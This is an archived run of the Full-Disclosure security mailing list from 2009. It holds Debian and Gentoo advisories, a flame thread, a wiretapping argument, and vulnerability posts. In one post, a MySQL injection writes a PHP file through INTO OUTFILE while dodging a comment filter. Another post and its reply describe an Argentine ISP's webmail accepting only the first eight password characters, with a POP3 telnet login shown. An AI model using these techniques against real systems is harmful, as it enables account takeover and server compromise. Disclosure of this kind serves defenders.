    Size/MD5 checksum: 28023040 9c2dbc349ec7702f781f978f27987da9
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_ia64.deb
    Size/MD5 checksum:  3087206 3638b390791d5053b67b060e6a124866
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-26etch1_ia64.deb
    Size/MD5 checksum: 28194506 228765e996a15ef56fc2cb94e74abeeb

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum:  3462292 f3f1c68ba029943c6054421c1ba23059
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum:   261230 26a45e4c0a77f21af0e5a6ffb0dc2b63
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum:    58266 f717cc289546c2037e4ca18aa630ceb9
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum:  3486460 4c5d5df532d84da56f78e47ce6262d60
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum:   262664 e499f6e0e4278f5d4263c9a952877624
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum:   263770 d12d5f3fce934b3db4dd29d5349d84a4
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum: 15240084 96adc4183855af04aaeca7db1d37a27e
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum: 17113852 9db05c81e32ef07f342eb54374c6ac6e
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum: 16727566 dfbc08d63a91ba7bef73dfca238559f7
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum: 16506028 0f65a31aecb306f281348ad410174926
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum: 17068826 bc0941830a8d7369abaf876837a0c81e
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum:   262882 d5d2a01011e0a9efea7a7b2c0cbacc41
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum: 18433752 23a6d8183e781a43469daf3cd7769fcb
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum:   237826 90097f02a1ed0a29b81fe3bc64259696
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum:    58312 6330638237601d3ea55b2a80d1c54540
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum: 18384182 18eabc40e998896c8f77243e84f99458
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum:   254332 4ac0852bf3ba527f890f828ecd749284
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-26etch1_powerpc.deb
    Size/MD5 checksum:   262220 a5ee6d47da04555615ad2bab7f646b13

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-26etch1_s390.deb
    Size/MD5 checksum:   148246 96f1a25db3b6aa699af3ad7185a96bd2
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-26etch1_s390.deb
    Size/MD5 checksum:   149402 44a4ec702fc2410f733aabe494c0f4e4
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-26etch1_s390.deb
    Size/MD5 checksum:   148624 78919a54c4a93dbf395369a106c76b5b
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-26etch1_s390.deb
    Size/MD5 checksum:    58276 133b1b15cca9cb34e07eae4f3ec4a3db
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-26etch1_s390.deb
    Size/MD5 checksum:  5410288 dd1b3737c133081f4b512c2a1ecb1cf6
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-26etch1_s390.deb
    Size/MD5 checksum:  5626808 5b7dc2c64fac5988d6070a1cddeb19f3
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-26etch1_s390.deb
    Size/MD5 checksum:  5672368 f31471a55f12bb17eade213d7672cb80
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch1_s390.deb
    Size/MD5 checksum:  2971470 e546925e4309b61b6b598de04b6a1e5a
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-26etch1_s390.deb
    Size/MD5 checksum:  1445974 f80e8929c0406cbae86ba2bdf6c611e2
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_s390.deb
    Size/MD5 checksum:    58256 3c413237e42a72c9b70f58cb65278ce9
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_s390.deb
    Size/MD5 checksum:  2948300 f57e56f38edd5977cf95012c373f9519

  These changes will probably be included in the oldstable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iD8DBQFK83KvhuANDBmkLRkRArSkAJ9j5GzWPxH7ooBKs8LsNUuHqJX6mACggefc
1yS24k5hkTFNJYNpO7XsGkA=
=qEzS
-----END PGP SIGNATURE-----


From akl at experian.dk  Fri Nov  6 11:06:53 2009
From: akl at experian.dk (Anders Klixbull)
Date: Fri, 6 Nov 2009 12:06:53 +0100
Subject: [Full-disclosure] Hash
In-Reply-To: <5ae653bf0911020347h6c5d7398h1acbf1fb4fb742bb@mail.gmail.com>
References: <4b13609c0910282301q3d6d9384l6804c5b9a1f5918f@mail.gmail.com><5ae653bf0910290029v54a71a62y788e0aa048519801@mail.gmail.com><dd979be40911020057k76d406c2w78bf7fd140842d25@mail.gmail.com>
	<5ae653bf0911020347h6c5d7398h1acbf1fb4fb742bb@mail.gmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD3270B@PRO-EXCHANGESRV.experian.dk>

Taunting other people's english skills work better when your own english isn't broken :)

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Fionnbharr
Sent: 2. november 2009 12:48
To: Pete Licoln
Cc: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Hash

It's true, Laurent is a blackhat. I am glad the security community at large is accepting this fact. This matter has been passed onto his soon to be employers.

Aside from that I'm not trolling, just speaking my mind. Something you're obviously familiar with doing. Can't we be friends? I mean, you don't like that Krakow Labs person either. It's can be the icebreaker in our internet relationship. We can have and eDinner and discuss interesting topics like your broken english and terrible comparisons.

Eventually though our love with wither and we'll stop mIRC32ing together so much. It'll happen slowly at first, taking 30+ mins to reply to a query, but it'll quickly grow much like our mutual ambivalence. Until one day I'll care about you as much as a dropped like a UDP packet.

:_(

2009/11/2 Pete Licoln <pete.licoln at gmail.com>:
> Fionnbharr,
> laurent is blackhat peace of spit asshole, and you're an attention seeker.
> Everyone knows, the only remote bug you can find is ?an xss or even 
> better a csrf.
> laurent will find some nastie stufft as always, but will totally screw 
> up at disclosing theses issues (as argumented before the smb2 bugm aka soulseek).
> Your troll sucks fionnbharr davies no one cares about you, and will, 
> you're like dropped tcp packet.
>
> 2009/10/29 Fionnbharr <thouth at gmail.com>
>>
>> That sure would have be some funny words, glad I'm not talking about 
>> how difficult to exploit it is! That would make me look pretty dumb 
>> bringing something totally unrelated to my comment into the argument.
>>
>> Yeeeeeeeeeep.
>>
>> 2009/10/29 laurent gaffie <laurent.gaffie at gmail.com>:
>> > Bonjour Fionnbharr Davies!,
>> >
>> > I'm glad to make your life easier with the shasum full path, really.
>> >
>> > Regarding the "Grossly misdiagnosed bug"; That's some funny words 
>> > to describe one of the most difficult bug to exploit in 2009 
>> > (http://seclists.org/dailydave/2009/q4/2)
>> >
>> >
>> >
>> >
>> > Laurent
>> >
>> >
>> > Bonjour!
>> >
>> > Is this going to be another grossly misdiagnosed bug?
>> >
>> > Also I'm glad you put that /usr/bin at the start, it would have 
>> > been confusing otherwise.
>> >
>> >
>> >
>> >
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


From reallyanonymous at hush.com  Wed Nov  4 23:00:20 2009
From: reallyanonymous at hush.com (reallyanonymous at hush.com)
Date: Wed, 04 Nov 2009 20:00:20 -0300
Subject: [Full-disclosure] Argentinean Arnet isp webmail
Message-ID: <20091104230020.DBAF42803F@smtp.hushmail.com>

Moderate vulnerability in argentinean ARNET isp webmail.

well, there is some kind of weakened authentication on the webmail 
of Arnet
(webmail.arnet.com.ar) to access any account all you need is to 
guess the first 8 characters of the password, even if the password 
is 9,10,11,12,14 or more characters long. This password is the same 
than ADSL access acount.

for example:

For this account
johndoe at arnet.com.ar
password:a1a2a3a4a5a6a7a8a9a0

you only need (first 8 character)

johndoe at arnet.com.ar
password:a1a2a3a4

ADSL account in this case is

Name: johndoe at arnet
Password:a1a2a3a4a5a6a7a8a9a0

there are no anti bruteforce mecanism so you can guess almost any 
account within a couple of hours.



From vladimir.vorontsov at onsec.ru  Fri Nov  6 12:55:22 2009
From: vladimir.vorontsov at onsec.ru (Vladimir Vorontsov)
Date: Fri, 06 Nov 2009 15:55:22 +0300
Subject: [Full-disclosure]  MySQL trick for SQL injection
Message-ID: <a2d3b1b16dad5cad72adcd4923d9d9fd@mail.onsec.ru>

Good day!

I recently encountered a problem with the implementation of SQL injection. 

I wanted to write a file with the code interpreter to execute commands, but
in the end always append bracket, which I thought was supposed to be a
spoiler. 

Comments at the end of the query to be filtered. The last character is
always append a closing parenthesis. Use a null-byte, too, was impossible. 

Was an injection of this type: 

$query = "select bla-bla from content_comments where user_id in (select
user_id from User where id =".removeBadChars($_GET['id']).");"; 
Where removeBadChars () kills such things as: 
-- 
/* 
but leaves /**/ 
I wanted to write a script to execute commands in a file. The rows included
in the first select, but the presence of brackets before inkludom demanded
its closure after it. Besides tricky function is not allowed to finish a
comment form - or /* at the end of the query. 

As a result, very surprised, because that's such an option: 

select bla-bla from content_comments where user_id in (select user_id from
User where id = 1/**/into/**/outfile/**/"/var/www/avatars/img.php") 

recorded in the file the result of EXTERNAL select!. 

Checked in 
MySQL 4.1.22 
MySQL 5.1.x

-- 
-----------------------------------------------------------------
Best regards!
Vladimir Vorontsov, security expert.
ONsec: turn on security


From a3li at gentoo.org  Fri Nov  6 13:36:49 2009
From: a3li at gentoo.org (Alex Legler)
Date: Fri, 6 Nov 2009 14:36:49 +0100
Subject: [Full-disclosure] [ GLSA 200911-01 ] Horde: Multiple vulnerabilities
Message-ID: <20091106143649.09ef2e48@mail.netloc.info>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200911-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Horde: Multiple vulnerabilities
      Date: November 06, 2009
      Bugs: #285052
        ID: 200911-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in the Horde Application Framework can allow
for arbitrary files to be overwritten and cross-site scripting attacks.

Background
==========

Horde is a web application framework written in PHP.

Affected packages
=================

    -------------------------------------------------------------------
     Package                   /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  www-apps/horde                 < 3.3.5                   >= 3.3.5
  2  www-apps/horde-webmail         < 1.2.4                   >= 1.2.4
  3  www-apps/horde-groupware       < 1.2.4                   >= 1.2.4
    -------------------------------------------------------------------
     3 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Multiple vulnerabilities have been discovered in Horde:

* Stefan Esser of Sektion1 reported an error within the form library
  when handling image form fields (CVE-2009-3236).

* Martin Geisler and David Wharton reported that an error exists in
  the MIME viewer library when viewing unknown text parts and the
  preferences system in services/prefs.php when handling number
  preferences (CVE-2009-3237).

Impact
======

A remote authenticated attacker could exploit these vulnerabilities to
overwrite arbitrary files on the server, provided that the user has
write permissions. A remote authenticated attacker could conduct
Cross-Site Scripting attacks.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Horde users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =www-apps/horde-3.3.5

All Horde webmail users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =www-apps/horde-webmail-1.2.4

All Horde groupware users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =www-apps/horde-groupware-1.2.4

References
==========

  [ 1 ] CVE-2009-3236
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3236
  [ 2 ] CVE-2009-3237
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3237

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200911-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 198 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091106/42c76531/attachment.bin 

From pschmehl_lists at tx.rr.com  Fri Nov  6 16:04:54 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Fri, 06 Nov 2009 10:04:54 -0600
Subject: [Full-disclosure] MySQL trick for SQL injection
In-Reply-To: <a2d3b1b16dad5cad72adcd4923d9d9fd@mail.onsec.ru>
References: <a2d3b1b16dad5cad72adcd4923d9d9fd@mail.onsec.ru>
Message-ID: <B49655397ECADAE1E6355B29@utd65257.utdallas.edu>

--On Friday, November 06, 2009 06:55:22 -0600 Vladimir Vorontsov 
<vladimir.vorontsov at onsec.ru> wrote:

>
> Good day!
>
> I recently encountered a problem with the implementation of SQL injection.
>
> I wanted to write a file with the code interpreter to execute commands, but
> in the end always append bracket, which I thought was supposed to be a
> spoiler.
>
> Comments at the end of the query to be filtered. The last character is
> always append a closing parenthesis. Use a null-byte, too, was impossible.
>
> Was an injection of this type:
>
> $query = "select bla-bla from content_comments where user_id in (select
> user_id from User where id =".removeBadChars($_GET['id']).");";
> Where removeBadChars () kills such things as:
> --
> /*
> but leaves /**/
> I wanted to write a script to execute commands in a file. The rows included
> in the first select, but the presence of brackets before inkludom demanded
> its closure after it. Besides tricky function is not allowed to finish a
> comment form - or /* at the end of the query.
>
> As a result, very surprised, because that's such an option:
>
> select bla-bla from content_comments where user_id in (select user_id from
> User where id = 1/**/into/**/outfile/**/"/var/www/avatars/img.php")
>
> recorded in the file the result of EXTERNAL select!.
>
> Checked in
> MySQL 4.1.22
> MySQL 5.1.x
>

What privileges did the user who performed the select have?

INTO OUTFILE is a dangerous routine (as you've clearly demonstrated), but that 
privilege must be specifically granted to a user before it's possible to 
execute it.  No sensible administrator would grant the FILE privilege to a 
webserver application's database acccount.  (Usually SELECT, INSERT, and UPDATE 
should be enough.)

OTOH, if you've found a way to execute FILE without having that privilege 
granted to the account, you've uncovered a serious problem.

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson


From Valdis.Kletnieks at vt.edu  Fri Nov  6 16:37:28 2009
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Fri, 06 Nov 2009 11:37:28 -0500
Subject: [Full-disclosure] MySQL trick for SQL injection
In-Reply-To: Your message of "Fri, 06 Nov 2009 10:04:54 CST."
	<B49655397ECADAE1E6355B29@utd65257.utdallas.edu>
References: <a2d3b1b16dad5cad72adcd4923d9d9fd@mail.onsec.ru>
	<B49655397ECADAE1E6355B29@utd65257.utdallas.edu>
Message-ID: <5540.1257525448@turing-police.cc.vt.edu>

On Fri, 06 Nov 2009 10:04:54 CST, Paul Schmehl said:
> What privileges did the user who performed the select have?
> 
> INTO OUTFILE is a dangerous routine (as you've clearly demonstrated), but that 
> privilege must be specifically granted to a user before it's possible to 
> execute it.  No sensible administrator would grant the FILE privilege to a 
> webserver application's database acccount.

Very true, but a good blackhat always keeps a good supply of ways to exploit
common stupid administrator mistakes.  I'd not be surprised in the least if
more than 10% of the sites, some admin under time pressure to Just Fix It
assigned FILE privs to get the web application back up and running.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 227 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091106/cf119060/attachment.bin 

From etropos at gmail.com  Fri Nov  6 16:38:32 2009
From: etropos at gmail.com (Ing. Juan Perez)
Date: Fri, 6 Nov 2009 13:38:32 -0300
Subject: [Full-disclosure] Argentinean Arnet isp webmail
References: <20091104230020.DBAF42803F@smtp.hushmail.com>
Message-ID: <A237FB591CFB4FBDA1F828652466393D@terminal>

Confirmed, thanks
and POP3 too:

c:\>telnet pop3.arnet.com.ar 110

+OK
user P0*****4241 at arnet.com.ar
+OK please, send your password
pass P0*****4241               >>>>>>>>>>>>>> real password
+OK Welcome to your mailbox !!!
quit
+OK Have a nice day!


Se ha perdido la conexi?n con el host.

+OK
user P0*****4241 at arnet.com.ar
+OK please, send your password
pass P0*****4                 >>>>>>>>>>>>>>> only first 8
+OK Welcome to your mailbox !!!
quit
+OK Have a nice day!

----- Original Message ----- 
From: <reallyanonymous at hush.com>
To: <full-disclosure at lists.grok.org.uk>
Sent: Wednesday, November 04, 2009 8:00 PM
Subject: [Full-disclosure] Argentinean Arnet isp webmail


> Moderate vulnerability in argentinean ARNET isp webmail.
>
> well, there is some kind of weakened authentication on the webmail
> of Arnet
> (webmail.arnet.com.ar) to access any account all you need is to
> guess the first 8 characters of the password, even if the password
> is 9,10,11,12,14 or more characters long. This password is the same
> than ADSL access acount.
>
> for example:
>
> For this account
> johndoe at arnet.com.ar
> password:a1a2a3a4a5a6a7a8a9a0
>
> you only need (first 8 character)
>
> johndoe at arnet.com.ar
> password:a1a2a3a4
>
> ADSL account in this case is
>
> Name: johndoe at arnet
> Password:a1a2a3a4a5a6a7a8a9a0
>
> there are no anti bruteforce mecanism so you can guess almost any
> account within a couple of hours.
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> __________ Informaci?n de ESET NOD32 Antivirus, versi?n de la base de 
> firmas de virus 4579 (20091106) __________
>
> ESET NOD32 Antivirus ha comprobado este mensaje.
>
> http://www.eset.com
>
>
> 


__________ Informaci?n de ESET NOD32 Antivirus, versi?n de la base de firmas de virus 4579 (20091106) __________

ESET NOD32 Antivirus ha comprobado este mensaje.

http://www.eset.com




From Valdis.Kletnieks at vt.edu  Fri Nov  6 16:46:39 2009
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Fri, 06 Nov 2009 11:46:39 -0500
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: Your message of "Thu, 05 Nov 2009 21:47:41 CST."
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>
Message-ID: <5915.1257525999@turing-police.cc.vt.edu>

On Thu, 05 Nov 2009 21:47:41 CST, Paul Schmehl said:
> > Getting back on topic, it is well-known, and proven, that the NSA has
> > surveillence facilities inside  several U.S. telecom carriers.  You need
> > only look inside one of AT&T's PoPs in San Francisco for proof.
> >
> 
> You know this to be true because you've looked for yourself, right?  You 
> didn't just take the world of a complete stranger quoted by a compliant 
> press at face value, did you?

Hey Paul: Thanks for this enlightening point.  I've just realized that
Mt Everest doesn't exist either, and we've all been taking the word of
complete strangers quoted by a compliant National Geographic. All those
pics are 'shopped, you can tell by the pixels.

C'Mon Paul, quit being a total intentionally blind asshole.  You presumably
know how things like BGP and packet forwarding work, and there's nice maps
of most of the sub-ocean fiberoptic cables. Using a minute's *thought* would
show that if the NSA wanted to do *any* surveillance in a reasonably
efficient manner, they *would* have to create surveillance facilities at
the major peering points and exchanges.

You know how traceroute works.  The locations of all the trans-oceanic
fiber cables are *very* well documented (they have to be, it sucks if you
lose your cable because a trawler didn't know it was there).  From that,
it's pretty easy to figure out where you want to put your intercept facilities.

So you're stuck with one of two choices:

1) Believe that the NSA in fact didn't do any hoovering of transmissions even
though they've come out and said they did.

2) Admit that they would indeed need a room right near the ATT PoP in SF
right where the whistleblower said it was.

> And of course Congress knew nothing about it, even though they had been 
> briefed about it dozens of times and never raised a single objection.
...
> The fact that you believe that only those who violate their oath of office 
> are honest and only those who never violate their oath of office are 
> dishonest blinds you to the possibility that the truth lies somewhere in 
> between.

You appear to be similarly blinded to the possibility that perhaps, just
perhaps, the people in Congress had been... *gasp* lied to and the program
misrepresented.  Because those fine upstanding guys at the intelligence
and defense agencies would *never* do a thing like that, just like they
were all telling the truth back in 1969 and everything that Daniel Ellsberg
said was a lie.

Oh, and they didn't actually illegally wiretap Ellserg during his trial, so
there's no reason the judge should have dismissed all the charges.

Which is a more sensible approach - to question and worry about the governments
actual intentions *this* time (even though they may be innocent *this* time)
because they've done similar major-scale shit multiple times in your lifetime,
or to blindly accept what they say this time, even though they've pulled
similar shit multiple times in your memory?

"Fool me once, shame on you.  Fool me twice, shame on me".
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 227 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091106/7f4bc165/attachment.bin 

From tim-security at sentinelchicken.org  Fri Nov  6 16:55:26 2009
From: tim-security at sentinelchicken.org (Tim)
Date: Fri, 6 Nov 2009 08:55:26 -0800
Subject: [Full-disclosure] MySQL trick for SQL injection
In-Reply-To: <5540.1257525448@turing-police.cc.vt.edu>
References: <a2d3b1b16dad5cad72adcd4923d9d9fd@mail.onsec.ru>
	<B49655397ECADAE1E6355B29@utd65257.utdallas.edu>
	<5540.1257525448@turing-police.cc.vt.edu>
Message-ID: <20091106165526.GF2384@sentinelchicken.org>

> > INTO OUTFILE is a dangerous routine (as you've clearly demonstrated), but that 
> > privilege must be specifically granted to a user before it's possible to 
> > execute it.  No sensible administrator would grant the FILE privilege to a 
> > webserver application's database acccount.
> 
> Very true, but a good blackhat always keeps a good supply of ways to exploit
> common stupid administrator mistakes.  I'd not be surprised in the least if
> more than 10% of the sites, some admin under time pressure to Just Fix It
> assigned FILE privs to get the web application back up and running.


I find it's more common that they just have the application log in as
MySQL root.  It's foolish.  It happens more frequently than you'd like
to admit.  Makes my app pentests easier though. ;-)

tim


From gem at rellim.com  Fri Nov  6 17:01:43 2009
From: gem at rellim.com (Gary E. Miller)
Date: Fri, 6 Nov 2009 09:01:43 -0800 (PST)
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <5915.1257525999@turing-police.cc.vt.edu>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>
	<5915.1257525999@turing-police.cc.vt.edu>
Message-ID: <alpine.LNX.1.10.0911060858490.29118@catbert.rellim.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Yo Paul!

On Thu, 05 Nov 2009 21:47:41 CST, Paul Schmehl said:
> > Getting back on topic, it is well-known, and proven, that the NSA has
> > surveillence facilities inside  several U.S. telecom carriers.  You need
> > only look inside one of AT&T's PoPs in San Francisco for proof.
> >
>
> You know this to be true because you've looked for yourself, right?  You
> didn't just take the world of a complete stranger quoted by a compliant
> press at face value, did you?

Yes, I have seen several myself.  No need for me to take anyone's word
on it.

RGDS
GARY
- ---------------------------------------------------------------------------
Gary E. Miller Rellim 109 NW Wilmington Ave., Suite E, Bend, OR 97701
	gem at rellim.com  Tel:+1(541)382-8588

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFK9FZ5BmnRqz71OvMRAgNdAKCBOr2zn/A2f9DRdcvjgQ+p036VdwCgoEjM
6j/260+fPimZ/o68huBYD+w=
=BbZH
-----END PGP SIGNATURE-----


From pschmehl_lists at tx.rr.com  Fri Nov  6 19:03:34 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Fri, 06 Nov 2009 13:03:34 -0600
Subject: [Full-disclosure] MySQL trick for SQL injection
In-Reply-To: <20091106165526.GF2384@sentinelchicken.org>
References: <a2d3b1b16dad5cad72adcd4923d9d9fd@mail.onsec.ru>
	<B49655397ECADAE1E6355B29@utd65257.utdallas.edu>
	<5540.1257525448@turing-police.cc.vt.edu>
	<20091106165526.GF2384@sentinelchicken.org>
Message-ID: <B0BE6741B841D5707B35B6C7@utd65257.utdallas.edu>

--On Friday, November 06, 2009 10:55:26 -0600 Tim 
<tim-security at sentinelchicken.org> wrote:

>
>> > INTO OUTFILE is a dangerous routine (as you've clearly demonstrated), but
>> > that privilege must be specifically granted to a user before it's possible
>> > to execute it.  No sensible administrator would grant the FILE privilege
>> > to a webserver application's database acccount.
>>
>> Very true, but a good blackhat always keeps a good supply of ways to exploit
>> common stupid administrator mistakes.  I'd not be surprised in the least if
>> more than 10% of the sites, some admin under time pressure to Just Fix It
>> assigned FILE privs to get the web application back up and running.
>
>
> I find it's more common that they just have the application log in as
> MySQL root.  It's foolish.  It happens more frequently than you'd like
> to admit.  Makes my app pentests easier though. ;-)
>

All true, but then we don't have a program flaw, we have a config flaw.  If you 
run your web applications with root privileges on the database, you should be 
surprised when your app gets exploited.

The question I have for the OP is whether or not he's found a true bug in mysql 
or simply exposed one of the millions of ways to exploit stupidity.

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson


From fulldisc at ec-penflue.net  Fri Nov  6 19:11:11 2009
From: fulldisc at ec-penflue.net (YK)
Date: Sat, 07 Nov 2009 04:11:11 +0900
Subject: [Full-disclosure] How to receive SPAM mail
Message-ID: <4AF474CF.60701@ec-penflue.net>

Hi Full-disclosure

I have a SPAM filter and virus firewall testing.
So, I want to get the real SPAM is sent to a specific email address.
What better way is there anything?

-------------
YK <fulldisc[at]ec-penflue.net>


From pschmehl_lists at tx.rr.com  Fri Nov  6 19:25:43 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Fri, 06 Nov 2009 13:25:43 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <5915.1257525999@turing-police.cc.vt.edu>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>           
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>
	<5915.1257525999@turing-police.cc.vt.edu>
